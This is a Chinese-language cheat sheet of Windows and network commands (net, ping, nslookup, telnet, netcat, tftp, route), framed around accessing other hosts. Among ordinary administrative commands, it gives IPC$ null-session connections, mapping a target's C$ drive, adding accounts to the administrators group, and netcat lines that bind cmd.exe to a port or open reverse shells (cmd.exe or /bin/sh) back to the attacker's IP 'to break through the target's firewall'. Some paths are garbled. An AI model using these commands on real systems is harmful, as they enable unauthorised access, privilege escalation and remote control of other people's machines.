ftp命令
ftp -v ip地址(或者域名) 进入主机文件(-v禁止显示远程服务器的响应)
ftp
ftp -v ip地址(或者域名) -s:filename 上传文件
nbtstat命令
tcp统计数据命令
nbtstat -n 显示寄存在本地的名字和服务程序
nbtstat -a 显示所有连接和监听端口
nbtstat -c 显示缓存
nslookup命令
nslookup www.baidu.com 查询这个域名的ip地址。
nslookup -qt=mx baidu.com 查询mail服务器地址。
nslookup -qt=ns baidu.com 查询主DNS和副DNS。
nslookup -qt=A baidu.com 查询A记录。
ping命令
ping ip地址
ping ip地址 -t 不停的ping
ping ip地址(或域名)
ping -a ip地址
ping -t ip地址 -l 65 65的数据长度
ping -t ip地址 -l 65 -i 生存时间
net命令
net use \ip\ipc$ “ “ /user:” “ 建立IPC空链接
net use \ip\ipc$ “密码” /user:”用户名” 建立IPC非空链接
net use h: \ip\c$ “密码” /user:”用户名” 直接登陆后映射对方C:到本地为H:
net use h: \ip\c$ 登陆后映射对方C:到本地为H:
net use \ip\ipc$ /del 删除IPC链接
net use h: /del 删除映射对方到本地的为H:的映射
net user 用户名 密码 /add 建立用户
net user guest /active:yes 激活guest用户
net user 查看有哪些用户
net user 帐户名 查看帐户的属性
net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数
net start 查看开启了哪些服务
net start 服务名 开启服务;(如:net start telnet, net start schedule)
net stop 服务名 停止某服务
net time \目标ip 查看对方时间
net time \目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
net view 查看本地局域网内开启了哪些共享
net view \ip 查看对方局域网内开启了哪些共享
net share abc(共享名称) /delete
net share abc=c:\windows
pathping命令
pathing ip地址(域名) 显示路由表
tracert ip地址
telnet命令
telnet ip地址 端口
z从telnet回到shell
fg从shell回到telnet
nc命令
参数说明:
-h 查看帮助信息
-d 后台模式
-e prog程序重定向,一但连接就执行[危险]
-i secs延时的间隔
-l 监听模式,用于入站连接
-L 监听模式,连接天闭后仍然继续监听,直到CTR+C
-n IP地址,不能用域名
-o film记录16进制的传输
-p[空格]端口 本地端口号
-r 随机本地及远程端口
-t 使用Telnet交互方式
-u UDP模式
-v 详细输出,用-vv将更详细
-w数字 timeout延时间隔
-z 将输入,输出关掉(用于扫锚时)
基本用法:
nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口
nc -l -p 80 开启本机的TCP 80端口并监听
nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口
高级用法:
nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止
nc -L -p 80 > c:\log.txt 作为蜜罐用2:开启并不停地监听80端口,直到CTR+C,同时把结果输出到c:\log.txt
nc -L -p 80 < c:\honeyport.txt 作为蜜罐用3-1:开启并不停地监听80端口,直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用type.exe c:\honeyport | nc -L -p 80 作为蜜罐用3-2:开启并不停地监听80端 口,直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用
本机上用:nc -l -p 本机端口
在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 win2Knc -e /bin/sh 本机IP -p 本机端口 linux,unix 反向连接突破对方主机的防火墙 ,本机上用:nc -d -l -p 本机端口 < 要传送的文件路径及名称在对方主机上用:nc -vv 本机IP 本机端口 > 存放文件的路径及名称 传送文件到对方主机
备 注:
| 管道命令
< 或 > 重定向命令。“<”,例如:tlntadmn < test.txt 指把test.txt的内容
赋值给tlntadmn命令@ 表示执行@后面的命令,但不会显示出来(后台执行);例:@dir c:\winnt
d:\log.txt 意思是:后台执行dir,并把结果存在d:\log.txt中
与>>的区别 “>”指:覆盖;”>>”指:保存到(添加到)。
如:@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二个命令分别
执行二次比较看:用>>的则是把二次的结果都保存了,而用:>则只有一次的结果,是因为第二次的结果把第一次的覆盖了。
tftp命令
tftp -i ip地址 get 文件名
route命令
路由表操作
route add 209.98.32.33 mask 255.255.255.224 202.96.123.5 metric 5 添加路由表
route delete 209.98.32.33 删除路由表